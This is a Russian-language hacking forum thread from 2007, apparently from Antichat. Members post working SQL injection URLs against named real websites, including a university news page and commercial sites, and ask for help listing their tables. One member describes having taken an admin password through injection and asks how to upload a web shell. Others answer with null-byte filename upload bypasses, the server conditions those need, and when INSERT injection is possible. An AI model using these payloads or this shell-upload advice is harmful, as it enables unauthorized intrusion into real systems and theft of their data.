 |
|
15.12.2007, 03:15
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Расскажите ка мне в чём проблема =)
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20+from+information_schema.tables
|
|
|
15.12.2007, 03:41
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
юзеру мускула не хватает прав для листинга метадаты в этом фолдере хран. information_schem'ы
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
15.12.2007, 15:10
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
С нами:
9947280
Репутация:
11
|
|
Ситуация: нашел sql инъекцию, узнал пасс админа, зашел под админом. Могу присвоить картинки некоторым предметам, изменять некоторые предметы. И все. Как можно залить шелл??? Пробовал присвоить картинку шелл.рнр , но там есть фильтр. Помогите залить шелл.
|
|
|
|
15.12.2007, 15:22
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
а что за админка то? насколько я понял возможен аплоад файлов попробуй впиши веб шелл в файлы с именами bla.php%00.jpg или bla.php.rar...
__________________
Кто я?..
|
|
|
|
15.12.2007, 15:44
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
С нами:
9947280
Репутация:
11
|
|
Админка от онлайн игры.
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
|
|
|
|
15.12.2007, 15:47
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами:
10016425
Репутация:
1257
|
|
помогите подобрать таблу с юзерами
http://wapclick.info/forum/readmess.php?UIN=Guest&pass=Guest&next_row=1&topic =-1+union+select+0,0,1,0,2,0/*&room=1&user=1
Последний раз редактировалось mr.The; 15.12.2007 в 15:53..
Причина: Вот!
|
|
|
|
15.12.2007, 15:55
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
Пр удачной для тебя настройке сервера, т е magic_quotes_gpc=off и наличии кривого скрипта, файл загурзится с именем bla.php%00.jpg, после вызова функции copy() нулевой байт откинет разшерение .jpg и у тебя будет файл bla.php
|
|
|
|
15.12.2007, 16:44
|
|
Участник форума
Регистрация: 23.07.2007
Сообщений: 100
С нами:
9895923
Репутация:
52
|
|
Код:
http://www.verra-motors.ru/main/index.html?id=5'INSERT%20INTO%20Users%20VALUES('admin',%20'123')
Я конечно извиняюсь, может я нареоман в синтаксисе Mysql, но почему ошибки вылазят? |
|
|
|
15.12.2007, 16:47
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
нельзя в mysql inj вставлять записи
Разве что уязвимый запрос будет:
PHP код:
INSERT INTO [SQL-INJ] bla lba... /*
|
|
|
|
15.12.2007, 16:54
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
Klaus Doring у тебя идет выборка из таблицы т.е. можно только выбирать данные из таб и притом еще с объед запросом union ENFIX тебе показал как можно вставить данные, посмотри может на сайте есть рега и может там есть скуль.
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
